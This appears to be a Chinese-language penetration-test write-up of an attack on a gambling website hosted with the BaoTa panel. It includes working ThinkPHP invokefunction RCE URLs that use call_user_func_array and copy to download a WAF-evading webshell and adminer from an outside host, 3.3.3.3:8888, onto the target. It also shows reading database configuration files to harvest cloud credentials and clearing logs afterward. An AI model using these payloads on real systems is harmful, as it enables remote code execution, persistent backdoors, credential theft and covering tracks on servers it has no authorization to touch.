宝塔下的BC实战渗透

宝塔简介

宝塔面板是一款使用方便、功能强大、交互友好且终身免费的服务器管理软件。

集成一键配置：LAMP/LNMP/Tomcat/Node.js、网站、数据库、FTP、SSL，一键部署源码，通过Web端轻松管理服务器。

2分钟安装好面板，一键管理服务器。

服务器安装了宝塔面板可以在上面搭建网站，其实和云帮手，护卫神、WDCP都感觉差不多吧，都是作为这几年比较流行的面板，很多站长基本第一次操作linux面板就是这个。

服务器大多数是用windows系统或Linux系统，安装了Linux系统的服务器不是图形化界面，操作比较复杂，要输入命令，通过命令来执行操作，费时费力，但宝塔面板有Linux系统面板，可以安装LNMP、LAMP等环境，包括简单的备份、监控、定时计划，功能强大，用户使用反馈单机版的问题都有，但是没有针对新的SEO需求,做插件和功能调整。

测试过程

通过目录扫描发现 index.php

访问之，发现存在报错，并泄露相关CMS信息

尝试Thinkphp常规操作进行getshell

访问shell,发现phpinfo解析异常

通过信息搜集发现目标使用宝塔搭建的，怀疑是宝塔的waf过滤了尖括号

通过测试发现call_user_func_array函数可显示phpinfo但被限制了很多命令执行的函数，需要进行绕过一下

通过dnslog尝试发现正常出网

http://小生观察室/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://123.dnslog.cn/123.txt&vars[1][]=123.php

随即考虑远程插入宝塔变形后门文件，获取变形后门源代码可在公众号回复bypass_bt后门源代码即可！

http://小生观察室/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://3.3.3.3:8888/a_bx.php&vars[1][]=bypass.php

插入成功，虽然提示函数不推荐使用，但不影响我们正常访问权限

其他说明

如果上面的方式无法插入后门文件可能是因为目录结构的问题可以尝试添加到upload目录或者添加.进行上级目录跳转

https://小生观察室/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://3.3.3.3:8888/adminer.php&vars[1][]=./upload/adminer.php

通过查看源代码，发现确实宝塔干掉了

随即查找数据库配置文件进行连接，默认路径在：application/database.php

发现配置文件存在阿里云OSS

尝试通过行云管家连接ECS服务器，发现失败

最后对相关内容进行取证并打包源代码,清理记录走